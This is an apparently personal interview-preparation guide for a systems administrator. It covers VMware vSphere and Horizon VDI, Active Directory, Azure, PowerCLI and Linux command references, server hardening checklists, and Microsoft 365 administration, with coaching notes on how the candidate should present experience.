Cloud workload protection"Deep Security ran on both on-prem servers and AWS/Azure VMs — it's a CWPP. I've applied the same security posture across hybrid environments."Microsoft Defender for Cloud (formerly Azure Security Center)

Interview Q&A — Trend Micro / Security

What security tools have you worked with at the server level?
At CMS I administered Trend Micro Deep Security Manager — a cloud workload protection platform protecting 100+ hybrid cloud servers across our federal healthcare infrastructure. I managed policies for anti-malware, IDS/IPS with virtual patching, integrity monitoring, and log inspection across Windows and Linux servers. The IPS virtual patching capability was particularly valuable in a federal environment — it let us maintain a security posture against known CVEs while we worked through the formal change management process required to apply actual patches. That experience translates directly to understanding what Microsoft Defender for Servers and Defender for Cloud are doing in Azure environments.
What is virtual patching and why does it matter?
Virtual patching is an IPS capability where the security tool applies a rule that blocks exploitation of a known vulnerability — even before you've actually patched the underlying software. When a critical CVE drops, there's always a window between disclosure and when patches are tested, approved, and deployed — especially in regulated environments with change management requirements. Virtual patching closes that window. Trend Micro Deep Security's IPS module inspects network traffic going to the server and drops any packet that matches the exploit pattern for that CVE. The vulnerability still exists in the software, but the attack can't reach it.
✅ Deep real experience. ~1yr gap. The muscle memory is there — review the terminology tonight.

Keywords

vSphereESXivCenter (VCSA)ClusterDatacenter vMotionStorage vMotionvHADRSFault Tolerance (FT) VMDKSnapshotTemplateOVF/OVAThin/Thick DatastoreVMFSNFS DatastorevSAN vSwitchdvSwitchPort GroupVMkernel PortVLAN HorizonConnection ServerDesktop PoolInstant CloneDEMApp VolumesBlast/PCoIP VMware ToolsPowerCLIesxtopResource Pool

Architecture Stack

LayerComponentWhat it does
HardwarePhysical server (x86)CPU, RAM, NICs, HBAs, local disks
HypervisorESXiBare-metal hypervisor. Tiny footprint OS. VMs run on top.
ManagementvCenter (VCSA)Centralized management VM. Enables all advanced features — vMotion, HA, DRS. Without vCenter = per-host management only.
PlatformvSphereProduct suite name. ESXi + vCenter = vSphere.
ClusterClusterGroup of ESXi hosts managed together. Required for HA/DRS/vMotion.

Key Features Comparison

FeatureTriggerDowntime?Requires
vMotionAdmin-initiated — move running VM to another hostZerovCenter, shared storage, compatible CPUs
Storage vMotionAdmin-initiated — move VM's disks between datastores while runningZerovCenter
vHAAutomatic — host fails unexpectedly~5 min restart timevCenter, cluster, 2+ hosts
DRSAutomatic — load balances VMs across hosts via vMotionZero (vMotion)vCenter, cluster, shared storage
FTShadow VM runs lockstep — instantaneous takeoverZeroSpecific CPU/NIC, high overhead — critical VMs only

Storage — Provisioning & Datastores

Disk Provisioning Types

TypeSpace AllocatedZeroedPerformanceBest For
ThinOn demand — starts small, growsOn writeSlight overheadDev/test, storage-constrained
Thick Lazy ZeroedFull space at creationOn first writeGoodGeneral production
Thick Eager ZeroedFull space at creationAt creationBest — consistentDatabases, FT VMs, highest performance

Datastore Types

TypeProtocolNotes
VMFSLocal / FC / iSCSI (block)VMware's own FS. Multiple hosts can mount simultaneously. Most common for SAN.
NFSNFS (file)Mount NAS as datastore. Simple. Your EMC Isilon datastores at Disney were NFS.
vSANVMware software-definedPools ESXi host local disks into shared datastore. HCI — no external storage needed.
💡 Snapshots: take before a change, validate, delete within 24–48hrs. Delta files grow continuously and degrade performance. Long-running snapshots are a common datastore space problem. Never use as backup.

Networking — vSwitch vs dvSwitch

Standard vSwitch (VSS)Distributed Switch (VDS)
ScopeSingle ESXi hostCluster-wide — multiple hosts
Managed fromHost directlyvCenter only
ConfigEach host separatelyCentral — VMs keep settings when vMotioned
Enterprise featuresBasicLACP, NetFlow, port mirroring, NIOC

VMkernel Ports

Port TypeTrafficNotes
ManagementHost mgmt, SSH, vCenter commRequired — configured first
vMotionLive VM migration trafficDedicated NIC/VLAN recommended
vSANvSAN storage between hostsRequired for vSAN clusters
iSCSIiSCSI SAN connectivityFor iSCSI-backed VMFS
NFSNFS datastore connectivityUsed for Isilon NFS mounts
Fault ToleranceFT logging — primary to shadowVery low latency required

VMware Horizon VDI — Deep Dive

You ran 500+ concurrent Horizon sessions at CMS. This is your VDI story.

Architecture Components

ComponentWhat it doesYour experience
Connection ServerAuthentication broker. User connects here → gets directed to an available desktop from their pool. Runs on Windows Server.Administered at CMS
Desktop PoolCollection of VMs users can connect to. Can be dedicated (1 user always gets same VM) or floating (any available VM).Managed pools at CMS
Instant CloneVM "forked" from a running parent VM at login using vmFork. Provisioned in seconds. Stateless — wiped clean at logoff. Most scalable deployment type.Configured at CMS
Linked CloneShares a base disk with parent, has own delta disk. Persistent — user's changes survive reboots. Slower to provision than instant clone.Familiar
Full CloneComplete independent copy of parent VM. Most storage, most flexibility. Used for long-term dedicated desktops.Familiar
DEM (Dynamic Environment Manager)Manages user profiles, folder redirection, app settings, env variables. Since instant clones are stateless (wiped at logoff), DEM is what saves the user's settings and data between sessions.✅ Configured at CMS
App VolumesApplication layering — apps packaged into virtual disks (AppStacks) attached to the VM at login. User gets their apps without them being installed in the master image. Fast app delivery.Familiar
Unified Access Gateway (UAG)Reverse proxy appliance in DMZ. External users connect to UAG — it authenticates and proxies traffic to internal Connection Server. Replaced Security Server.Familiar

Display Protocols

ProtocolWhat it isBest for
Blast ExtremeVMware's modern protocol. HTML5/WebRTC-based. Works in browser. Adaptive bitrate.Most use cases — LAN and WAN. Default choice.
PCoIPTeradici's protocol. Older, Horizon still supports it. Hardware-accelerated on Teradici devices.Environments with existing PCoIP hardware
RDPStandard Microsoft RDP. Fallback.Basic/legacy access only

DEM — How It Works (Deep Dive)

DEM captures user environment settings and stores them in a network location (file share or SDRS). At login, DEM restores the user's settings to the session — even on an instant clone that has never seen that user before. At logoff, DEM saves any changes back to the store.

  • Folder Redirection — Desktop, Documents, AppData redirected to a network share. User's files follow them to any VDI session.
  • Application Config — DEM captures and restores per-app settings (browser bookmarks, Outlook profile, app preferences) using predefined templates or custom XML configs.
  • Environment Variables — Set per-user or per-group at login (drive mappings, printer assignments, PATH variables).
  • Privilege Elevation — DEM can grant specific apps elevated rights without making the user a local admin. FlexEngine is the client-side agent that applies DEM configs.
  • Predefined configs — DEM ships with predefined templates for common apps (Chrome, Firefox, Office apps). You customize and expand from there.
  • SmartPolicies — conditions-based policy application. Example: "If user is on VPN, disable USB redirection. If on LAN, allow it."

Horizon Interview Q&A

Walk me through your VDI experience with Horizon.
At CMS I managed a VMware Horizon environment with 500+ concurrent sessions on Azure — instant clone desktop pools for 2,000+ users. I configured DEM to handle profile management, folder redirection, and app settings since instant clones are stateless — DEM is what makes the user feel like they have a persistent desktop even though the underlying VM is destroyed at logoff. I managed the desktop pool lifecycle, troubleshot connection issues at the Connection Server level, and worked with Blast Extreme as the primary display protocol.
What's the difference between an instant clone and a full clone pool?
An instant clone is forked from a running parent VM at login — provisioned in seconds, stateless, and wiped at logoff. Very storage-efficient and scalable but you need DEM or folder redirection to persist user data. A full clone is an independent VM — it takes more time and storage to provision, but it's persistent and you don't need a separate profile solution. Instant clones are the right choice for a large, general-use workforce. Full clones for power users or specialized roles that need a dedicated machine.
Why is DEM important in an instant clone environment?
Instant clones are wiped at logoff — the VM that session ran on is destroyed. Without DEM, the user would lose everything: browser bookmarks, Outlook settings, app preferences, desktop files. DEM captures all of that to a network store during the session and restores it at next login — regardless of which clone the user lands on. Folder redirection handles the documents and desktop. DEM handles the application config and environment settings. Together they give users a persistent experience on a stateless infrastructure.
✅ Real, quantified. 85% ops reduction. Your top differentiator — lead with it in any interview.

Active Directory Cmdlets

# Users Get-ADUser -Identity "rmartinez" -Properties * Get-ADUser -Filter {Department -eq "IT"} | Select Name,SamAccountName New-ADUser -Name "John Doe" -SamAccountName "jdoe" -UserPrincipalName "jdoe@co.com" -Enabled $true -Path "OU=Users,DC=company,DC=com" Set-ADUser -Identity "jdoe" -Department "Finance" -Title "Analyst" Disable-ADAccount -Identity "jdoe" Unlock-ADAccount -Identity "jdoe" Set-ADAccountPassword -Identity "jdoe" -Reset -NewPassword (ConvertTo-SecureString "TempP@ss!" -AsPlainText -Force) Remove-ADUser -Identity "jdoe" -Confirm:$false # Groups Add-ADGroupMember -Identity "VPN-Users" -Members "jdoe","jsmith" Remove-ADGroupMember -Identity "VPN-Users" -Members "jdoe" -Confirm:$false Get-ADGroupMember -Identity "Domain Admins" | Select Name # Computers Get-ADComputer -Filter {OperatingSystem -like "*Server*"} | Select Name,OperatingSystem Move-ADObject -Identity "CN=PC01,CN=Computers,DC=co,DC=com" -TargetPath "OU=Workstations,DC=co,DC=com" # AD Health dcdiag /test:replications /v repadmin /replsummary repadmin /syncall /AdeP netdom query fsmo

Azure — Az PowerShell Module

# Connect Connect-AzAccount Set-AzContext -SubscriptionId "xxxx-xxxx-xxxx" # VM operations Get-AzVM -ResourceGroupName "RG-Prod" | Select Name,Location Get-AzVM -Status | Where {$_.PowerState -eq "VM deallocated"} # stopped VMs = still paying for disks Start-AzVM -ResourceGroupName "RG-Prod" -Name "VM-Web01" Stop-AzVM -ResourceGroupName "RG-Prod" -Name "VM-Web01" -Force Restart-AzVM -ResourceGroupName "RG-Prod" -Name "VM-Web01" Get-AzVM -ResourceGroupName "RG-Dev" | Stop-AzVM -Force -NoWait # bulk stop all in RG # Resize $vm = Get-AzVM -ResourceGroupName "RG-Prod" -Name "VM-Web01" $vm.HardwareProfile.VmSize = "Standard_D4s_v3" Update-AzVM -ResourceGroupName "RG-Prod" -VM $vm # Networking / Cost Get-AzNetworkSecurityGroup -ResourceGroupName "RG-Network" Get-AzDisk | Where {$_.DiskState -eq "Unattached"} # orphaned disks wasting money Get-AzResource -TagName "Environment" -TagValue "Production"

VMware — PowerCLI

# Connect Connect-VIServer -Server vcenter.company.local -Credential (Get-Credential) # VM operations Get-VM | Where {$_.PowerState -eq "PoweredOff"} | Select Name,ResourcePool Start-VM -VM "WebServer01" -Confirm:$false Stop-VMGuest -VM "WebServer01" -Confirm:$false # graceful via Tools Set-VM -VM "WebServer01" -NumCPU 4 -MemoryGB 16 -Confirm:$false # Snapshots Get-VM | Get-Snapshot | Select VM,Name,Created,@{N="SizeGB";E={[math]::Round($_.SizeMB/1024,2)}} Get-VM | Get-Snapshot | Where {$_.Created -lt (Get-Date).AddDays(-3)} | Select VM,Name,Created New-Snapshot -VM "WebServer01" -Name "Pre-Patch-$(Get-Date -Format yyyyMMdd)" -Quiesce $true -Memory $false Remove-Snapshot -Snapshot (Get-VM "WebServer01" | Get-Snapshot -Name "Pre-Patch*") -Confirm:$false # vMotion / Migration Move-VM -VM "WebServer01" -Destination (Get-VMHost "esxi02.company.local") -Confirm:$false Move-VM -VM "WebServer01" -Datastore (Get-Datastore "DS-SSD-01") # Storage vMotion # Host / Reporting Get-VMHost | Select Name,ConnectionState,@{N="CPU%";E={[math]::Round($_.CpuUsageMhz/$_.CpuTotalMhz*100,1)}} Set-VMHost -VMHost "esxi01.company.local" -State Maintenance Get-VM | Select Name,NumCPU,MemoryGB,PowerState | Export-Csv "vm-inventory.csv" -NoTypeInformation

Windows Server — General Commands

# Services / Processes Get-Service | Where {$_.Status -eq "Stopped" -and $_.StartType -eq "Automatic"} Restart-Service -Name "Spooler" -Force Get-Process | Sort CPU -Descending | Select -First 10 Name,CPU,WorkingSet # Disk / Volumes Get-Volume | Where {($_.SizeRemaining/$_.Size) -lt 0.10} | Select DriveLetter,@{N="Free%";E={[math]::Round($_.SizeRemaining/$_.Size*100,1)}} Get-Disk ; Get-Partition -DiskNumber 1 # Network Test-NetConnection -ComputerName "server01" -Port 443 Get-NetIPAddress | Where {$_.AddressFamily -eq "IPv4"} | Select IPAddress,InterfaceAlias Resolve-DnsName "server01.company.com" netstat -ano | findstr :3389 # Remote execution Invoke-Command -ComputerName "Server01","Server02" -ScriptBlock { Get-Service "W32Time" } Enter-PSSession -ComputerName "Server01" # Event logs — key security event IDs Get-WinEvent -FilterHashtable @{LogName="Security";Id=4625} -MaxEvents 20 # failed logons Get-WinEvent -FilterHashtable @{LogName="Security";Id=4740} -MaxEvents 10 # account lockouts Get-WinEvent -FilterHashtable @{LogName="Security";Id=4728} -MaxEvents 10 # added to security group Get-WinEvent -FilterHashtable @{LogName="Security";Id=4648} -MaxEvents 10 # explicit credential logon # GPO / time gpupdate /force ; gpresult /r w32tm /query /status ; w32tm /resync whoami /all # user + all groups + privileges

Bash — Linux Commands

# System top ; htop ; uptime ; uname -r ; lscpu df -h ; du -sh /var/log/* ; free -h # Services systemctl status nginx ; systemctl restart nginx ; systemctl enable nginx journalctl -u nginx -n 50 ; journalctl -f # Network ip addr show ; ip route show ss -tulnp # listening ports + what's using them curl -I https://google.com nslookup server01.company.com dig @192.168.1.10 server01.company.com # Files / Permissions ls -lah ; chmod 755 script.sh ; chown rudy:rudy file.txt find / -name "*.log" -mtime +30 -delete tail -f /var/log/syslog ; grep -r "error" /var/log/ # Users id username ; last | head -20 ; who passwd username ; usermod -aG sudo username # BigFix agent service besclient status /opt/BESClient/bin/BESClient -register

Filesystems — Windows

FilesystemMax File SizeMax VolumeUse Case & Key Facts
NTFS16 TB256 TBStandard for all Windows servers and workstations. Supports permissions (ACLs), encryption (EFS), compression, quotas, journaling (recovers from crashes), symbolic links, alternate data streams. You live here.
ReFS (Resilient FS)16 EB4.7 EBDesigned for large data, storage spaces, Hyper-V VHDs. Self-healing — detects/corrects corruption automatically. Does NOT support: boot volumes, EFS encryption, NTFS compression, dedup on some versions. Server 2012+
FAT324 GB2 TBLegacy. USB drives, removable media, boot partitions for EFI. No permissions. No journaling. Can't store files over 4GB — common pain point for large ISOs.
exFAT128 PB128 PBModern replacement for FAT32 on removable media. Large files OK. No permissions. Cross-platform (Windows/Mac/Linux). USB drives, SD cards.

NTFS Permissions — Know These

PermissionWhat it allows
Full ControlRead, write, modify, delete, change permissions, take ownership
ModifyRead, write, delete files/folders — cannot change permissions
Read & ExecuteView and run files — cannot modify
ReadView file contents and attributes only
WriteCreate files and folders, modify content — cannot delete
List Folder ContentsView folder contents only (folders, not files)
  • Inheritance — permissions flow down from parent folders. You can break inheritance on a child folder to assign unique permissions.
  • Effective Permissions — the combined result of NTFS + Share permissions. The more restrictive of the two applies when accessing over network.
  • Deny overrides Allow — if a user has Allow Read but is in a group with Deny Read, Deny wins.
  • NTFS vs Share Permissions — Share permissions only apply over the network. NTFS apply locally AND over network. Best practice: Share = Full Control to Everyone, lock down with NTFS only.

Filesystems — Linux

FilesystemNotesCommon Use
ext4Default for most Linux distros. Journaling, mature, stable. Max file 16TB, max volume 1EB.Root partition, most Linux servers
XFSHigh-performance, scalable. Excellent for large files and high-throughput workloads. RHEL default since v7.Large data, media, databases, RHEL servers
BtrfsCopy-on-write, built-in snapshots, RAID, checksums. Modern but less proven than ext4 for enterprise production.Snapshots, Fedora, some enterprise use
ZFSEnterprise-grade. Built-in RAID (RAIDZ), snapshots, compression, dedup, checksums. Memory-hungry. Not in mainline kernel.Storage servers, FreeBSD/Solaris, NAS appliances
NFSNetwork filesystem — mount remote shares over network. Your Isilon exports were NFS.Shared storage, VMware NFS datastores, home dirs
tmpfsRAM-based filesystem. Extremely fast. Lost on reboot. Mounted at /tmp, /run.Temporary files, fast scratch space
# Common Linux filesystem commands df -h # disk usage by filesystem du -sh /var/log/ # size of directory lsblk # list block devices and mount points blkid # show UUIDs and filesystem types mount /dev/sdb1 /mnt/data # mount a disk umount /mnt/data fsck /dev/sdb1 # filesystem check (run unmounted) e2fsck -f /dev/sdb1 # ext4 specific check xfs_repair /dev/sdb1 # XFS repair # /etc/fstab — persistent mounts UUID=xxxx-xxxx /mnt/data ext4 defaults 0 2 # Format a new disk mkfs.ext4 /dev/sdb1 mkfs.xfs /dev/sdb1

Imaging — Windows Deployment

Imaging Tools Overview

ToolWhat it doesComplexity
SysprepGeneralizes a Windows installation — removes machine-specific info (SID, hostname, hardware config) so it can be deployed to other hardware. Required before capturing any Windows image.Basic — built into Windows
WDS (Windows Deployment Services)PXE boot server — workstations boot from network and pull a WIM image. Basic deployment. Built into Windows Server.Low — simple environments
MDT (Microsoft Deployment Toolkit)Free toolkit from Microsoft. Task sequences to automate full OS deployment: format disk → apply WIM → install drivers → apply updates → join domain → install apps. Works standalone or integrated with SCCM/Intune.Medium — small/mid-size orgs
SCCM / MECMEnterprise Microsoft tool. Full lifecycle: OS deployment, software deployment, patch management, inventory, compliance. OSD (OS Deployment) task sequences are the gold standard for large orgs.High — enterprise
ClonezillaOpen-source disk cloning. Sector-by-sector copy or partition-level. Good for small shops, bare-metal recovery, physical-to-physical cloning.Low
Intune AutopilotModern cloud-based zero-touch provisioning. New device registers with Autopilot → user signs in with Azure AD credentials → Intune pushes apps, config, policies automatically. No imaging required.Medium — modern cloud shops

Sysprep / WIM Workflow

  • 1. Build reference machine — Install Windows, drivers, common apps. Fully patch. Configure settings.
  • 2. Run Sysprepsysprep /generalize /oobe /shutdown — removes SID, hostname, and resets to Out-of-Box Experience. Machine shuts down.
  • 3. Capture WIM — Boot to WinPE. Use DISM or MDT to capture the disk to a .WIM file: dism /Capture-Image /ImageFile:C:\images\win11.wim /CaptureDir:C:\ /Name:"Win11-Base"
  • 4. Deploy WIM — DISM applies the WIM to target machines, or PXE boot via WDS/MDT picks it up automatically.
  • 5. Specialize — Machine boots, Sysprep generates new unique SID, runs unattend.xml for customizations (hostname, domain join, regional settings).

Key Imaging Concepts

WIM (Windows Imaging Format)Microsoft's image format. File-based (not sector-by-sector), so it's hardware-independent. One WIM can contain multiple images (editions). DISM manages WIM files.
PXE BootPreboot Execution Environment. Machine boots from network NIC and contacts WDS/MDT server to pull an image. No boot media needed. Requires DHCP options 66/67 or PXE-capable switch/router.
WinPEWindows Preinstallation Environment — lightweight Windows that boots before the OS. Used for imaging, disk partitioning, DISM operations, recovery.
SIDSecurity Identifier — unique identifier for each Windows computer/user. Sysprep removes the machine SID so each deployed machine gets a unique one. Without Sysprep, cloned machines have duplicate SIDs = AD/domain issues.
Driver InjectionAdding hardware drivers to a WIM offline with DISM before deployment. Ensures the image works on different hardware models. dism /Add-Driver
DISMDeployment Image Servicing and Management. Command-line tool — capture, apply, mount, and service WIM images. Inject drivers, updates, features into a WIM offline.

Networking Fundamentals — Quick Reference

Key Ports to Know

PortProtocolService
22SSHSecure shell — Linux/network device remote access
25SMTPEmail sending (server to server)
53DNSDomain Name System
67/68DHCPIP address assignment
80HTTPWeb traffic (unencrypted)
88KerberosAD authentication
135/445SMB/RPCWindows file sharing, AD communication
389/636LDAP/LDAPSAD queries (636 = encrypted)
443HTTPSSecure web traffic
3389RDPRemote Desktop — never expose to internet
5985/5986WinRMPowerShell remoting (5986 = HTTPS)

Subnetting Quick Reference

CIDRSubnet MaskHostsCommon Use
/24255.255.255.0254Standard office subnet
/25255.255.255.128126Split /24 in half
/26255.255.255.19262Small department
/30255.255.255.2522Point-to-point links
/16255.255.0.065,534Large enterprise / VNet

Windows Server Hardening

Account & Authentication

  • Rename or disable the built-in Administrator account. Create a named admin account instead.
  • Disable the Guest account.
  • Enforce strong password policy via GPO: minimum 12 chars, complexity, no reuse of last 24, max age 90 days.
  • Account lockout: 5 bad attempts, 30-minute lockout, reset counter after 30 minutes.
  • Require MFA for all admin/privileged accounts.
  • Use PIM (Privileged Identity Management) — just-in-time elevation instead of standing admin accounts.
  • Implement LAPS (Local Administrator Password Solution) — unique, rotating local admin password per machine stored in AD. Eliminates lateral movement via shared local admin passwords.

Network & Services

  • Windows Firewall enabled on all profiles (Domain, Private, Public). Configure via GPO.
  • Disable SMBv1 — legacy, vulnerable to EternalBlue/WannaCry. Disable via PowerShell: Set-SmbServerConfiguration -EnableSMB1Protocol $false
  • Disable NetBIOS over TCP/IP and LLMNR where not needed. Both enable NTLM relay attacks.
  • Disable unnecessary services: Print Spooler (on non-print servers), Fax, Telnet, SNMP if not used.
  • Enable NLA (Network Level Authentication) for RDP — requires auth before session is established.
  • Restrict RDP access by firewall rule — source IP whitelist, not open to 0.0.0.0/0.
  • Enable Windows Defender / Defender for Endpoint. Keep definitions current.

Patching & Updates

  • Apply security patches on a defined schedule — critical within 24–72hrs of release, high within 7 days, medium within 30 days.
  • Use WSUS or MECM/Intune to manage patching centrally. Never rely on individual machines updating themselves.
  • Test patches in non-prod first for critical servers. Have rollback plan (snapshot before patching).

Auditing & Logging

  • Enable audit policies via GPO: logon events, account management, privilege use, object access, policy changes.
  • Forward event logs to a SIEM or Log Analytics Workspace for centralized monitoring.
  • Retain security logs — minimum 90 days, 1 year for compliance environments.
  • Monitor key event IDs: 4625 (failed logon), 4740 (lockout), 4728 (added to priv group), 4648 (explicit cred logon).

Hardening Commands

# Disable SMBv1 Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force Get-SmbServerConfiguration | Select EnableSMB1Protocol,EnableSMB2Protocol # Check open shares Get-SmbShare | Where {$_.Name -notlike "*$"} # non-hidden shares # Disable unnecessary services Set-Service -Name "Spooler" -StartupType Disabled -Status Stopped # on non-print servers # Enable Windows Firewall all profiles Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True # Check local admins Get-LocalGroupMember -Group "Administrators" # LAPS — check if installed, get password Get-AdmPwdPassword -ComputerName "DESKTOP01" # Require NLA for RDP (registry) Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" -Name "UserAuthentication" -Value 1 # Check Windows Defender status Get-MpComputerStatus | Select AMRunningMode,RealTimeProtectionEnabled,AntivirusSignatureLastUpdated

Linux Server Hardening

Account & SSH

  • Disable root SSH login: in /etc/ssh/sshd_config set PermitRootLogin no
  • Use SSH key authentication instead of passwords: PasswordAuthentication no in sshd_config.
  • Change default SSH port from 22 (optional, reduces noise — not real security). Or use fail2ban to block brute force.
  • Create a dedicated non-root user with sudo for administration. Never work as root day to day.
  • Set AllowUsers or AllowGroups in sshd_config to limit who can SSH in.
  • Enforce strong password policy: /etc/security/pwquality.conf — min length, complexity requirements.
  • Set password aging: chage -M 90 -W 14 username (expire after 90 days, warn 14 days before).

Network & Firewall

  • Enable firewall: firewalld (RHEL/CentOS) or ufw (Ubuntu). Block everything, allow only what's needed.
  • Check open ports: ss -tulnp or netstat -tulnp. Close anything not in use.
  • Disable IPv6 if not used: reduces attack surface. Set in /etc/sysctl.conf.
  • Use TCP Wrappers (/etc/hosts.allow, /etc/hosts.deny) for legacy service restriction.

Services & Packages

  • Minimal install — don't install what you don't need. Every unused package is a potential vulnerability.
  • Disable unnecessary services: systemctl disable --now <service>
  • Keep packages updated: yum update -y (RHEL) or apt upgrade -y (Ubuntu). Automate with cron or unattended-upgrades.
  • Install and configure fail2ban — blocks IPs with repeated failed auth attempts.

Auditing & File Integrity

  • Enable auditd for kernel-level auditing — tracks file access, privilege escalation, system calls.
  • Install and run Lynis (open-source security auditing tool) for hardening score and recommendations.
  • Use AIDE (Advanced Intrusion Detection Environment) for file integrity monitoring — detects unauthorized file changes.
  • Set SUID/SGID audit: find / -perm /4000 -type f — know what has elevated permissions.
  • Restrict /etc/sudoers — use visudo, limit commands, use groups not individual users.
  • Forward logs to central syslog server or SIEM.

Hardening Commands

# SSH hardening sed -i 's/#PermitRootLogin.*/PermitRootLogin no/' /etc/ssh/sshd_config sed -i 's/#PasswordAuthentication.*/PasswordAuthentication no/' /etc/ssh/sshd_config systemctl restart sshd # Firewall (firewalld) systemctl enable --now firewalld firewall-cmd --permanent --add-service=ssh firewall-cmd --permanent --add-port=443/tcp firewall-cmd --permanent --remove-service=dhcpv6-client firewall-cmd --reload firewall-cmd --list-all # UFW (Ubuntu) ufw default deny incoming ufw default allow outgoing ufw allow 22/tcp ; ufw allow 443/tcp ufw enable ; ufw status verbose # Patch yum update -y # RHEL/CentOS apt update && apt upgrade -y # Ubuntu/Debian # Fail2ban systemctl enable --now fail2ban fail2ban-client status sshd # Check SUID files (should be minimal) find / -perm /4000 -type f 2>/dev/null # Audit open ports ss -tulnp # Check running services systemctl list-units --type=service --state=running

Hardening Q&A

Walk me through how you harden a new Windows server.
Start with the baseline before anything touches the network — disable SMBv1, rename and disable the default Administrator account, configure Windows Firewall on all profiles, and enable NLA for RDP. Then apply the organization's security GPO to bring it into the domain baseline: password policy, audit logging, AppLocker or Defender settings. Install LAPS if the org uses it so the local admin password is unique and rotating. Enable Defender and verify definitions are current. Patch it fully before putting it in production. Then it joins the monitoring stack — event logs forwarding to the SIEM, alerts configured for key event IDs.
How do you harden a new Linux server?
Minimal install is the starting point — only what's needed for the role. Create a non-root admin user with sudo, disable root SSH login, switch SSH to key-based auth only. Enable and configure firewalld or UFW — deny all inbound, allow only what the service needs. Install fail2ban to block brute force. Fully patch before going live — yum update or apt upgrade. Set up auditd for kernel-level logging and forward to the central syslog. Run Lynis to get a hardening score and work through the recommendations. Document the baseline so the next person knows what's expected.
⚠️ Limited direct admin experience. Honest bridge: mailbox support, license management, user-level M365 admin. Study this section — you'll be able to speak to it at a working knowledge level.

M365 Keywords

Microsoft 365 Admin CenterExchange OnlineSharePoint Online OneDrive for BusinessTeamsIntune Azure AD / Entra IDMFAConditional AccessSSPR Exchange Online Protection (EOP)Defender for M365Safe LinksSafe Attachments Shared MailboxDistribution GroupDynamic GroupMailbox Alias SPFDKIMDMARCMX Record License AssignmentM365 Business PremiumE3 / E5PowerShell (ExO) TenantGlobal AdminExchange AdminHelpdesk Admin

M365 Architecture — What Is It?

Microsoft 365 (formerly Office 365) is a SaaS subscription that bundles cloud productivity apps, security, and device management. For a sysadmin, the key services you'd touch:

ServiceWhat it isAdmin tasks
Exchange OnlineCloud email platform. Replaces on-prem Exchange Server for most orgs.Create/manage mailboxes, shared mailboxes, distribution groups, aliases, mail flow rules, spam filtering
SharePoint OnlineCloud document management and intranet platform.Create sites/libraries, manage permissions, storage quotas
OneDrive for BusinessPer-user cloud file storage. 1TB+ per user.Monitor storage, recover deleted files, external sharing policy
TeamsChat, video, collaboration. Backed by SharePoint (file storage) and Exchange (calendar, voicemail).Create teams/channels, guest access, meeting policies, calling plans
IntuneMDM/MAM — manage devices and apps from Entra ID. Part of M365.Device enrollment, compliance policies, app deployment
Entra ID (Azure AD)Identity backbone for all M365 services. Users, MFA, Conditional Access.User management, license assignment, MFA enforcement, Conditional Access policies
Defender for M365Security layer: anti-phishing, Safe Links, Safe Attachments, attack simulation.Configure policies, review threats, run simulations

M365 Admin Centers

Microsoft 365 Admin Centeradmin.microsoft.com — main hub. User management, license assignment, service health, billing, support tickets.
Exchange Admin Center (EAC)admin.exchange.microsoft.com — mailboxes, mail flow rules, spam/anti-phishing policies, connectors, message trace.
Azure AD / Entra Adminentra.microsoft.com — users, groups, MFA, Conditional Access, Privileged Identity Mgmt, app registrations.
Intune Admin Centerintune.microsoft.com — device enrollment, compliance policies, configuration profiles, app deployment.
SharePoint AdminManage sites, storage, external sharing settings, hub sites.
Security & Compliancecompliance.microsoft.com — DLP policies, retention labels, eDiscovery, audit log search, Defender policies.

Common Exchange Online Tasks

Mailbox Types

TypeWhat it isLicense needed?
User MailboxStandard personal mailbox for one userYes — M365 license required
Shared MailboxAccessed by multiple users (e.g., info@company.com, helpdesk@). No one logs into it directly.No license if under 50GB
Room MailboxRepresents a meeting room. Users invite the room. Auto-accepts/declines based on availability.No license required
Equipment MailboxLike room but for equipment (projectors, AV cart)No license required
Archive MailboxAdditional mailbox storage that auto-archives old email. Requires compliance license.E3 or above

Mail Flow Concepts

  • MX Record — DNS record pointing to where email for your domain should be delivered. In M365 it points to Microsoft's servers.
  • SPF — Sender Policy Framework. TXT record that lists authorized mail servers for your domain. Reduces spoofing.
  • DKIM — DomainKeys Identified Mail. Cryptographic signature on outgoing email. Proves email wasn't tampered with in transit.
  • DMARC — Domain-based Message Authentication. Policy that tells receiving servers what to do if SPF/DKIM fail: none, quarantine, or reject.
  • Mail Flow Rules (Transport Rules) — conditions + actions on messages passing through Exchange Online. Example: "If subject contains 'URGENT' from external senders, add disclaimer and move to spam review."
  • Connectors — configure mail flow between M365 and on-prem Exchange (hybrid), or third-party services.

Exchange Online PowerShell

# Connect Install-Module ExchangeOnlineManagement Connect-ExchangeOnline -UserPrincipalName admin@company.com # Mailbox operations Get-Mailbox -Identity "john.doe@company.com" | Select DisplayName,RecipientTypeDetails,ProhibitSendReceiveQuota Get-Mailbox -RecipientTypeDetails SharedMailbox | Select Name,PrimarySmtpAddress New-Mailbox -Name "Help Desk" -Alias "helpdesk" -Shared -PrimarySmtpAddress "helpdesk@company.com" Add-MailboxPermission -Identity "helpdesk@company.com" -User "jdoe@company.com" -AccessRights FullAccess -AutoMapping $true Set-Mailbox -Identity "jdoe@company.com" -AddEmailAddresses "jdoe.alt@company.com" # add alias # Distribution groups Get-DistributionGroup -Identity "IT-Team" Add-DistributionGroupMember -Identity "IT-Team" -Member "jdoe@company.com" # Message trace Get-MessageTrace -SenderAddress "sender@external.com" -StartDate (Get-Date).AddDays(-2) -EndDate (Get-Date) # Mailbox size report Get-Mailbox -ResultSize Unlimited | Get-MailboxStatistics | Select DisplayName,TotalItemSize | Sort TotalItemSize -Desc | Select -First 20 # Disconnect Disconnect-ExchangeOnline -Confirm:$false

M365 Licensing

PlanKey InclusionsTypical Use
M365 Business BasicExchange Online, Teams, SharePoint, OneDrive — web/mobile onlyLight users, frontline workers
M365 Business StandardAbove + desktop Office apps (Word/Excel/PowerPoint)Most office users
M365 Business PremiumAbove + Intune, Defender, Azure AD P1, advanced securitySMB that needs security features
M365 E3Full desktop Office, advanced compliance, archive mailbox, Azure AD P1Enterprise
M365 E5E3 + Defender for M365, Azure AD P2, Power BI Pro, voiceEnterprise with advanced security/compliance
💡 License assignment: go to M365 Admin Center → Users → Active Users → select user → Licenses. Or use PowerShell: Set-MsolUserLicense (older) or Set-AzureADUserLicense / Graph API (modern).

M365 Interview Q&A

What's your M365 experience?
